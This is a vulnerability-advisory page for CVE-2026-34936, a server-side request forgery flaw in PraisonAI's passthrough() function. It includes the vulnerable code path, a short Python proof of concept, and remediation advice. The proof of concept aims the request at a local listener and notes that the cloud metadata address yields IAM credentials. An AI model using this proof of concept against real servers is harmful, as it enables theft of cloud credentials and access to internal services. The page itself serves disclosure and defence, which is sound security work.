Skip to main content

Redis CVE-2026-34936

HIGH
Server-Side Request Forgery (SSRF) (CWE-918)
2026-04-01 https://github.com/MervinPraison/PraisonAI GHSA-x6m9-gxvr-7jpv
7.7
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.7 HIGH
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

3
Patch released
Apr 02, 2026 - 14:30 nvd
Patch available
Analysis Generated
Apr 02, 2026 - 00:15 vuln.today
CVE Published
Apr 01, 2026 - 23:21 nvd
HIGH 7.7

DescriptionGitHub Advisory

Summary

passthrough() and apassthrough() in praisonai accept a caller-controlled api_base parameter that is concatenated with endpoint and passed directly to httpx.Client.request() when the litellm primary path raises AttributeError. No URL scheme validation, private IP filtering, or domain allowlist is applied, allowing requests to any host reachable from the server.

Details

passthrough.py:92 (source) -> passthrough.py:109 (fallback trigger) -> passthrough.py:110 (sink)

python
# source -- api_base taken directly from caller
def passthrough(endpoint, api_base=None, method="GET", ...):
# fallback trigger -- AttributeError from unrecognised provider enters fallback
except AttributeError:
    url = f"{api_base or 'https://api.openai.com'}{endpoint}"
# sink -- no validation before request
    response = client.request(method, url=url, ...)

PoC

python
# tested on: praisonai 1.5.87 (source install)
# install: pip install -e src/praisonai
# start listener: python3 -m http.server 8888
import sys, litellm
sys.path.insert(0, 'src/praisonai')
del litellm.llm_passthrough_route

from praisonai.capabilities.passthrough import passthrough

result = passthrough(
    endpoint="/ssrf-test",
    api_base="http://127.0.0.1:8888",
    method="GET",
    custom_llm_provider="__nonexistent__",
)
print(result)
# expected output: PassthroughResult(data='...', status_code=404, headers={'server': 'SimpleHTTP/0.6 Python/3.12.3', ...})
# listener logs: "GET /ssrf-test HTTP/1.1" 404
# on EC2 with IMDSv1: api_base="http://169.254.169.254" returns IAM credentials

Impact

On cloud infrastructure with IMDSv1 enabled, an attacker can retrieve IAM credentials via the EC2 metadata service. Internal services (Redis, Elasticsearch, Kubernetes API) are reachable without authentication from within the VPC. The Flask API server deploys with AUTH_ENABLED = False by default, making this reachable over the network without credentials.

AnalysisAI

Server-Side Request Forgery in PraisonAI's passthrough API allows authenticated remote attackers to access internal cloud metadata services and private network resources. The vulnerability affects the praisonai Python package where the passthrough() and apassthrough() functions accept unvalidated caller-controlled api_base parameters that are directly concatenated and passed to httpx requests. With default AUTH_ENABLED=False configuration, this is remotely exploitable to retrieve EC2 IAM credent

Technical ContextAI

This is a classic Server-Side Request Forgery vulnerability (CWE-918) in the PraisonAI Python package's HTTP passthrough capability. The passthrough.py module implements a fallback mechanism for LLM provider routing: when litellm raises AttributeError for unrecognized providers, the code enters an exception handler that concatenates the caller-supplied api_base parameter with an endpoint path and passes it directly to httpx.Client.request() without any validation. The vulnerable code path is: passthrough.py:92 accepts api_base from caller, line 109 catches AttributeError and constructs the URL via string concatenation (url = f"{api_base or 'https://api.openai.com'}{endpoint}"), and line 110 executes the HTTP request with no scheme validation, IP address filtering, or domain allowlisting. The httpx library faithfully executes requests to any reachable destination including RFC 1918 private addresses (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), localhost (127.0.0.1), and link-local addresses (169.254.0.0/16). This architectural flaw is compounded by PraisonAI's Flask API server deploying with AUTH_ENABLED=False by default, removing the low-privilege authentication barrier indicated in the CVSS vector and effectively making this network-accessible without credentials in default configurations.

RemediationAI

Users should immediately review the official GitHub Security Advisory at https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x6m9-gxvr-7jpv for vendor-provided remediation guidance and patch availability. No vendor-released patch version is independently confirmed from the available data at time of analysis. As interim mitigations, organizations should enable authentication by setting AUTH_ENABLED=True in the Flask API server configuration to enforce the low-privilege requirement indicated in the CVSS vector, implement network-layer controls to block outbound requests from PraisonAI servers to RFC 1918 private address ranges and link-local addresses (169.254.0.0/16), upgrade EC2 instances to IMDSv2 which requires PUT requests with token headers that cannot be exploited via simple GET-based SSRF, and if possible avoid using the passthrough() and apassthrough() functions with untrusted input until a patched version is released. Network egress filtering should deny access to internal service ports (6379 for Redis, 9200 for Elasticsearch, 6443/8443 for Kubernetes) from the PraisonAI application tier. Consider implementing application-layer allowlists that restrict api_base parameters to explicitly approved external API domains if passthrough functionality is required for legitimate use cases.

More in Redis

View all
CVE-2026-48172 CRITICAL POC
10.0 May 21

LiteSpeed User-End cPanel Plugin before 2.4.5 allows privilege escalation (possibly to root), as exploited in the wild i

CVE-2025-49844 CRITICAL POC
9.9 Oct 03

UAF in Redis 8.2.1 via crafted Lua scripts by authenticated users. EPSS 12.4%. Patch available.

CVE-2022-0543 CRITICAL POC
10.0 Feb 18

It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific

CVE-2018-11218 CRITICAL POC
9.8 Jun 17

Memory Corruption was discovered in the cmsgpack library in the Lua subsystem in Redis before 3.2.12, 4.x before 4.0.10,

CVE-2025-46817 HIGH POC
7.0 Oct 03

Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user

CVE-2015-4335 CRITICAL POC
10.0 Jun 09

Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command.

CVE-2016-8339 CRITICAL POC
9.8 Oct 28

A buffer overflow in Redis 3.2.x prior to 3.2.4 causes arbitrary code execution when a crafted command is sent. Rated cr

CVE-2026-27574 CRITICAL POC
9.9 Feb 21

Code injection in OneUptime monitoring via custom JS monitor using vm module. PoC and patch available.

CVE-2021-31649 CRITICAL POC
9.8 Jun 24

In applications using jfinal 4.9.08 and below, there is a deserialization vulnerability when using redis,may be vulnerab

CVE-2020-11981 CRITICAL POC
9.8 Jul 17

An issue was found in Apache Airflow versions 1.10.10 and below. Rated critical severity (CVSS 9.8), this vulnerability

CVE-2018-11219 CRITICAL POC
9.8 Jun 17

An Integer Overflow issue was discovered in the struct library in the Lua subsystem in Redis before 3.2.12, 4.x before 4

CVE-2024-23998 CRITICAL POC
9.6 Jul 05

goanother Another Redis Desktop Manager =<1.6.1 is vulnerable to Cross Site Scripting (XSS) via src/components/Setting.v

Share

CVE-2026-34936 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy